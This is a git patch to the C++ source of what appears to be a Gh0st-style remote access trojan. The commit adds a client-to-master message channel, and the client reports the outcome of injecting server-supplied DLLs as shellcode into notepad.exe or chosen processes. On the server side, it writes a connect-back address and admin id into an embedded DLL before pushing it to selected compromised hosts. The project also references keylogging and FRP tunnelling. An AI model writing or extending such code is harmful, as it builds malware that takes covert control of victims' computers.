From 250ae098980fa103cf7af6610361a0f435d86103 Mon Sep 17 00:00:00 2001 From: shaun <962914132@qq.com> Date: Mon, 15 Dec 2025 16:21:00 +0100 Subject: [PATCH] Feature: Add command for client sending msg to master --- client/ClientDll.cpp | 1 + client/IOCPClient.cpp | 2 ++ client/KernelManager.cpp | 14 ++++++--- common/commands.h | 13 ++++++++ server/2015Remote/2015Remote.rc | Bin 106518 -> 106546 bytes server/2015Remote/2015RemoteDlg.cpp | 45 +++++++++++++++++++++------- server/2015Remote/AudioDlg.h | 2 +- server/2015Remote/IOCPServer.h | 10 +++++++ server/2015Remote/SettingDlg.cpp | 6 ++++ 9 files changed, 77 insertions(+), 16 deletions(-) diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp index de8c48a..f0fd2d5 100644 --- a/client/ClientDll.cpp +++ b/client/ClientDll.cpp @@ -519,6 +519,7 @@ DWORD WINAPI StartClient(LPVOID lParam) LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings); while (ClientObject->IsRunning() && ClientObject->IsConnected() && !ClientObject->SendLoginInfo(login)) WAIT_n(app.m_bIsRunning(&app), 5 + time(0)%10, 200); + while (ClientObject->IsRunning() && ClientObject->IsConnected()) WAIT_n(app.m_bIsRunning(&app), 10, 200); do { Manager->SendHeartbeat(); diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp index 0c70abc..81cf632 100644 --- a/client/IOCPClient.cpp +++ b/client/IOCPClient.cpp @@ -337,8 +337,10 @@ BOOL IOCPClient::ConnectServer(const char* szServerIP, unsigned short uPort) if (m_hWorkThread == NULL) { #ifdef _WIN32 + m_bIsRunning = TRUE; m_hWorkThread = (HANDLE)__CreateThread(NULL, 0, WorkThreadProc,(LPVOID)this, 0, NULL); m_bWorkThread = m_hWorkThread ? S_RUN : S_STOP; + m_bIsRunning = m_hWorkThread ? TRUE : FALSE; #else pthread_t id = 0; m_hWorkThread = (HANDLE)pthread_create(&id, nullptr, (void* (*)(void*))IOCPClient::WorkThreadProc, this); diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index f95e42d..c3329ff 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -141,7 +141,8 @@ typedef struct DllExecParam { DllExecuteInfo info; PluginParam param; BYTE* buffer; - DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data) : info(dll), param(arg) + CManager* manager; + DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data, CManager* m) : info(dll), param(arg), manager(m) { buffer = new BYTE[info.Size]; memcpy(buffer, data, info.Size); @@ -180,6 +181,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param) DllExecParam* dll = (DllExecParam*)param; DllExecuteInfo info = dll->info; PluginParam pThread = dll->param; + CManager* This = dll->manager; #ifdef _DEBUG WriteBinaryToFile((char*)dll->buffer, info.Size, info.Name); DllRunner* runner = new DefaultDllRunner(info.Name); @@ -212,8 +214,12 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param) bool flag = info.CallType == CALLTYPE_IOCPTHREAD; ShellcodeInj inj(dll->buffer, info.Size, flag ? "run" : 0, flag ? &pThread : 0, flag ? sizeof(PluginParam) : 0); if (info.Pid < 0) info.Pid = GetCurrentProcessId(); - bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true); - Mprintf("Inject %s to process [%d] %s\n", info.Name, info.Pid, ret ? "succeed" : "failed"); + int ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true); + char buf[256]; + sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, info.Pid ? info.Pid : ret, ret ? "succeed" : "failed"); + Mprintf("%s\n", buf); + ClientMsg msg("代码注入", buf); + This->SendData((LPBYTE)&msg, sizeof(msg)); } SAFE_DELETE(dll); SAFE_DELETE(runner); @@ -522,7 +528,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) } if (data) { PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn); - CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL)); + CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data, this), 0, NULL)); Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size); } break; diff --git a/common/commands.h b/common/commands.h index 8b36316..6671580 100644 --- a/common/commands.h +++ b/common/commands.h @@ -268,6 +268,7 @@ enum { TOKEN_ERROR = 230, // ʾ TOKEN_SHELL_DATA = 231, // ն˽ CMD_EXECUTE_DLL = 240, // ִд + TOKEN_CLIENT_MSG = 241, // ͻϢ }; enum MachineCommand { @@ -1154,4 +1155,16 @@ typedef struct CharMsg { } }CharMsg; +typedef struct ClientMsg { + char cmd; + char title[31]; + char text[512]; + ClientMsg() { memset(this, 0, sizeof(*this)); } + ClientMsg(const char* title, const char* text) { + cmd = TOKEN_CLIENT_MSG; + strcpy_s(this->title, title ? title : "ʾϢ"); + strcpy_s(this->text, text ? text : ""); + } +}ClientMsg; + #endif diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc index ed447ac3972b92d967a0f30576071ae5216c0e57..15a5d62c865aa9b290374cc2fdba9f1a39b0ef70 100644 GIT binary patch delta 25 hcmbPsfNj$OwhdXDlYQFkCe1Z!-lw^JpC)5O832_k3iAK} delta 22 ecmdmVfNk0VwhdXDlWnF1HQ&(OenXQnstf>jx(V6< diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 04fb36e..f835772 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -293,6 +293,22 @@ DllInfo* ReadTinyRunDll(int pid) std::string name = TINY_DLL_NAME; DWORD fileSize = 0; BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize); + std::string s(skCrypt(FLAG_FINDEN)), ip, port; + int offset = MemoryFind((char*)dllData, s.c_str(), fileSize, s.length()); + if (offset != -1) { + std::string ip = THIS_CFG.GetStr("settings", "master", ""); + int nPort = THIS_CFG.Get1Int("settings", "ghost", ';', 6543); + std::string master = ip.empty() ? "" : ip + ":" + std::to_string(nPort); + CONNECT_ADDRESS* server = (CONNECT_ADDRESS*)(dllData + offset); + if (!master.empty()) { + splitIpPort(master, ip, port); + server->SetServer(ip.c_str(), atoi(port.c_str())); + server->SetAdminId(GetMasterHash().c_str()); + server->iType = CLIENT_TYPE_MEMDLL; + server->parentHwnd = g_2015RemoteDlg ? (uint64_t)g_2015RemoteDlg->GetSafeHwnd() : 0; + memcpy(server->pwdHash, GetPwdHash().c_str(), 64); + } + } // 设置输出参数 auto md5 = CalcMD5FromBytes(dllData, fileSize); DllExecuteInfo info = { SHELLCODE, fileSize, CALLTYPE_DEFAULT, {}, {}, pid }; @@ -839,8 +855,8 @@ LRESULT CMy2015RemoteDlg::OnShowErrMessage(WPARAM wParam, LPARAM lParam) m_CList_Message.InsertItem(0, title ? *title : "操作错误"); m_CList_Message.SetItemText(0, 1, strTime); m_CList_Message.SetItemText(0, 2, text ? *text : "内部错误"); - delete title; - delete text; + if(title)delete title; + if(text)delete text; return S_OK; } @@ -2226,6 +2242,11 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject) // 【L】:主机上下线和授权 // 【x】:对话框相关功能 switch (cmd) { + case TOKEN_CLIENT_MSG: { + ClientMsg *msg =(ClientMsg*)ContextObject->InDeCompressedBuffer.GetBuffer(0); + PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title)); + break; + } case TOKEN_AUTH: { BOOL valid = FALSE; if (len > 20) { @@ -4119,14 +4140,16 @@ void CMy2015RemoteDlg::OnParamKblogger() void CMy2015RemoteDlg::OnOnlineInjNotepad() { auto tinyRun = ReadTinyRunDll(0); - EnterCriticalSection(&m_cs); - for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) { - context* ctx = *i; - if (!ctx->IsLogin()) - continue; - Buffer* buf = tinyRun->Data; - ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo)); - } - LeaveCriticalSection(&m_cs); + EnterCriticalSection(&m_cs); + POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition(); + while (Pos) { + int iItem = m_CList_Online.GetNextSelectedItem(Pos); + context* ctx = (context*)m_CList_Online.GetItemData(iItem); + if (!ctx->IsLogin()) + continue; + Buffer* buf = tinyRun->Data; + ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo)); + } + LeaveCriticalSection(&m_cs); SAFE_DELETE(tinyRun); } diff --git a/server/2015Remote/AudioDlg.h b/server/2015Remote/AudioDlg.h index a970d85..2a96a41 100644 --- a/server/2015Remote/AudioDlg.h +++ b/server/2015Remote/AudioDlg.h @@ -21,7 +21,7 @@ public: static DWORD WINAPI WorkThread(LPVOID lParam); - void CAudioDlg::OnReceiveComplete(void); + void OnReceiveComplete(void); // Ի enum { IDD = IDD_DIALOG_AUDIO }; diff --git a/server/2015Remote/IOCPServer.h b/server/2015Remote/IOCPServer.h index f798136..bbeb5be 100644 --- a/server/2015Remote/IOCPServer.h +++ b/server/2015Remote/IOCPServer.h @@ -133,6 +133,16 @@ public: virtual ~CDialogBase() {} public: + virtual BOOL ReceiveCommonMsg() { + switch (m_ContextObject->InDeCompressedBuffer.GetBYTE(0)) { + case TOKEN_CLIENT_MSG: { + ClientMsg* msg = (ClientMsg*)m_ContextObject->InDeCompressedBuffer.GetBuffer(0); + PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title)); + return TRUE; + } + } + return FALSE; + } virtual void OnReceiveComplete(void) = 0; // ΪǷڽ void MarkReceiving(bool recv = true) diff --git a/server/2015Remote/SettingDlg.cpp b/server/2015Remote/SettingDlg.cpp index ec570e9..8dfc43f 100644 --- a/server/2015Remote/SettingDlg.cpp +++ b/server/2015Remote/SettingDlg.cpp @@ -139,6 +139,12 @@ BOOL CSettingDlg::OnInitDialog() BOOL frp = THIS_CFG.GetInt("frp", "UseFrp"); ((CButton*)GetDlgItem(IDC_RADIO_FRP_OFF))->SetCheck(!frp); ((CButton*)GetDlgItem(IDC_RADIO_FRP_ON))->SetCheck(frp); +#ifndef _WIN64 + GetDlgItem(IDC_RADIO_FRP_OFF)->EnableWindow(FALSE); + GetDlgItem(IDC_RADIO_FRP_ON)->EnableWindow(FALSE); + GetDlgItem(IDC_EDIT_FRP_PORT)->EnableWindow(FALSE); + GetDlgItem(IDC_EDIT_FRP_TOKEN)->EnableWindow(FALSE); +#endif m_nFrpPort = THIS_CFG.GetInt("frp", "server_port", 7000); m_sFrpToken = THIS_CFG.GetStr("frp", "token").c_str();